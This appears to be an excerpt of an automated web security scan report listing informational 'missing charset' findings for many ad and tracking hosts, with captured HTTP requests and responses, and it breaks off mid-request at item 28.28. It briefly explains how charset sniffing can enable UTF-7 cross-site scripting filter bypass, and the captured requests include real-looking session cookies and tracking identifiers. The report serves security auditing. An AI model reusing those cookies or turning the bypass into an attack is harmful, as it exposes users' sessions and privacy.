http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
http://scripts.chitika.net/static/hq/lifescript.js
https://servicing.capitalone.com/favicon.ico
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://static.addtoany.com/menu/sm3.html
http://support.klout.com/
http://support.klout.com/favicon.ico
http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4
http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4
http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4
http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220
http://trk.etrigue.com/track.php
http://w55c.net/ct/cms-2-frame.html
http://web2.checkm8.com/adam/detect
http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php
http://www.everestjs.net/static/ad_if_c.html
http://www.hitcon.org/hit2011/
http://www.hitcon.org/hit2011/download.html
http://www.lifescript.com/adcontrol.htm
http://www.lifescript.com/html/comScore.htm
http://www.nmmlaw.com/templates/nmm_2011/images/bg/spacer4.jpg
http://www.seashepherd.org/
http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B4616765.3

Request

Response

28.2. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B4820225

Request

Response

28.3. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B4820225.2

Request

Response

28.4. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5327.LifeScript/B5695360.3

Request

Response

28.5. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5767.dsc.discoveryOX2348/B5649101.33

Request

Response

28.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.10

Request

Response

28.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.11

Request

Response

28.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.12

Request

Response

28.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.16

Request

Response

28.10. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.Discovery/B5629823.17

Request

Response

28.11. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_newsreel

Request

Response

28.12. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/markets_story

Request

Response

28.13. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

Response

28.14. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Request

GET /adscgen/st.php?survey_num=922005&site=67575097&code=42823090&randnum=1100774 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12;sz=300x250;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/2080163699/x25/DCI/6748_HewlettPackard_D_819486339/07212011_HP_6748_DCI_1stImpRdBlk_300x250_12_17205266.html/7263485738303471796b67414345734b?;ord=2080163699?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ST=908257_; CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:18 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b101.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php?ord="+Math.floor((new Date()).getTime()/1000);

}
})();

28.15. http://analytics.microsoft.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.microsoft.com
Path:	/Sync.html

Request

Response

28.16. http://analytics.msn.com/Include.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.msn.com
Path:	/Include.html

Request

Response

28.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=1 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

28.18. http://ds.addthis.com/red/psi/sites/www.seashepherd.org/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.seashepherd.org/p.json

Request

GET /red/psi/sites/www.seashepherd.org/p.json?callback=_ate.ad.hpr&uid=4e282ba90cea006f&url=http%3A%2F%2Fwww.seashepherd.org%2Fnews-and-media%2F2011%2F07%2F19%2Femergency-sos-from-captain-paul-watson-save-our-ship-1263&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&1lobfdh HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh46.html
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uid=4e282ba90cea006f; psc=4; di=%7B%7D..1311255774.10R|1311255774.1FE|1311255774.19F|1311255774.1OD|1311255774.60|1311255774.1EY; dt=X; uit=1

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 23 Jul 2011 13:15:17 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 22 Aug 2011 13:15:17 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 23 Jul 2011 13:15:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 23 Jul 2011 13:15:17 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

28.19. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

GET /activityi;src=1566767;type=apple663;cat=apple249;ord=7035145137924.701? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 21 Jul 2011 20:29:29 GMT
Expires: Thu, 21 Jul 2011 20:29:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

28.20. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Request

GET /load/?p=104&g=080&j=0&u=1234567&site=2222 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: xltl=eJw1y7EOQiEMheF3YSehtLdQ7mR08C4uxtkApYmzcTK%252Bu3gTl5Mz%252FF8tWN7POe62ndw6XyxOkuAgqGKIUI1RWsq15xaZWyPbuykO579QqwAwQ8owULoJLZKYtWpYRmy%252FDqC410Pv1xhouxx3ysWlAUYag6%252FZyFNQ9KI5ee4WiVCHxODWzxe9BCw8; BFF=eJxLtDK3qi62MjS0UgoxNDBxdHewtLQ0UrLOtDI0MzO2BsoYWyn5%252BvuFePhExod5BnuGKFknWhka4NdkBpNANghFtTGyjAFExg%252FdGFOoOC61KIYAFQcbGZh4%252BjnXGBiCZE3RtCFkkSWM4BLoeszhMnDBWrK8Qa6bcTmtFgBvAmjU; TFF=eJxLtDI0sqouBpFKhgYmDsbGBg6WlpZGStaJVkCJTCtDayA2MzMGUgYwZi2GekOQemM09UbWEC6yPnO4NuJ0AGkDExwq0d0ENDs1IjUnsSQVl9kmOHxhZEiar6HqcfraCLuvgdqI1QGyyQioxcDUkGiXIak3JSE%252BoNqIjQ8jnPGBqrIWAFDJmT0%253D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAzNzIzjzeONDEziDUwN403iDZWsa2sBRvENCw%253D%253D

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: text/html
Content-Length: 369
Date: Sat, 23 Jul 2011 04:48:31 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

28.21. http://mediacdn.disqus.com/1311185431/build/system/def.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311185431/build/system/def.html

Request

GET /1311185431/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: __qca=P0-1994503427-1305051999515

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Jul 2011 19:43:29 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 26765
X-Varnish: 1914030963
Cache-Control: max-age=2507574
Expires: Fri, 19 Aug 2011 20:02:28 GMT
Date: Thu, 21 Jul 2011 19:29:34 GMT
Connection: close

<!DOCTYPE html>

<html>
<body>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//sigma.disqus.c
...[SNIP]...

28.22. http://mediacdn.disqus.com/1311185431/build/system/facebook.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311185431/build/system/facebook.html

Request

GET /1311185431/build/system/facebook.html HTTP/1.1
Host: mediacdn.disqus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: __qca=P0-1994503427-1305051999515

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Jul 2011 19:43:30 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 3558
X-Varnish: 1914037933
Cache-Control: max-age=2507539
Expires: Fri, 19 Aug 2011 20:01:53 GMT
Date: Thu, 21 Jul 2011 19:29:34 GMT
Connection: close

<!DOCTYPE html>

<html>
<head>
<meta charse="utf-8">
<title></title>
<script>
document.domain = 'disqus.com';
</script>

<script src="http://mediacdn.disqus.com/1311185
...[SNIP]...

28.23. http://mediacdn.disqus.com/1311382870/build/system/def.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311382870/build/system/def.html

Request

GET /1311382870/build/system/def.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1309224200.12.12.utmcsr=tech.fortune.cnn.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/01/04/the-secs-challenge-in-the-secondary-market/; __utma=113869458.981292312.1305368048.1308922018.1309224200.12

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 23 Jul 2011 01:27:42 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 26765
X-Varnish: 2011265522
Cache-Control: max-age=2549343
Expires: Mon, 22 Aug 2011 01:28:28 GMT
Date: Sat, 23 Jul 2011 13:19:25 GMT
Connection: close

<!DOCTYPE html>

<html>
<body>
<script>
document.domain = 'disqus.com';

var urls = {
sigma: (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//sigma.disqus.c
...[SNIP]...

28.24. http://mediacdn.disqus.com/1311382870/build/system/reply.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311382870/build/system/reply.html

Request

GET /1311382870/build/system/reply.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utma=113869458.981292312.1305368048.1309224200.1311427177.13; __utmb=113869458.1.10.1311427177; __utmc=113869458; __utmz=113869458.1311427177.13.13.utmcsr=treehugger.com|utmccn=(referral)|utmcmd=referral|utmcct=/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 23 Jul 2011 01:27:45 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 33052
X-Varnish: 2011265101
Cache-Control: max-age=2549370
Expires: Mon, 22 Aug 2011 01:29:01 GMT
Date: Sat, 23 Jul 2011 13:19:31 GMT
Connection: close

<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>

<style type="text/css">

...[SNIP]...

28.25. http://mediacdn.disqus.com/1311382870/build/system/upload.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311382870/build/system/upload.html

Request

Response

28.26. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Request

GET /utils/ping.html?random=0.2879168479703367 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="jIHpRjW4fRupx/ksspDebmqaTbfWC7yRNls1xBLluQgdIrCgnQmt8f0OG1e2lvOWewstTj20P33hLvNp2sFawtPR1Z6o06ly"; _lvd2="QxPkU7shPGw1+QgA/tr6aYpv6sU4XxpDvhpGUWAVbdxum3vhQDvhPUkHLqKwYK6HvK0fdQU6QtnC5iqvK3AtCibHcn7D4laysaiEITRU094c//0cei+APAvrLaQlRDc3ROcxJQPNhG8="; _rcc2="NXlRX9sMiul1qh8tJqlLY/LX1tChDsE5AuYRduTkm+U="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1311068672000"
Last-Modified: Tue, 19 Jul 2011 09:44:32 GMT
Content-Type: text/html
Content-Length: 158
Date: Sat, 23 Jul 2011 13:48:20 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

28.27. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com
Path:	/intl/en/ipv6/exp/iframe.html

Request

GET /intl/en/ipv6/exp/iframe.html HTTP/1.1
Host: p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 09:12:38 GMT
Date: Sat, 23 Jul 2011 13:43:49 GMT
Expires: Sat, 23 Jul 2011 13:43:49 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 2298
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type=text/javascript>
(function() {

var f=this,g=function(b,d){var a=b.split("."),c=f;!(a[0]in c)&&c.execScript&&c.execScript("var
...[SNIP]...

28.28. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com
Path:	/intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
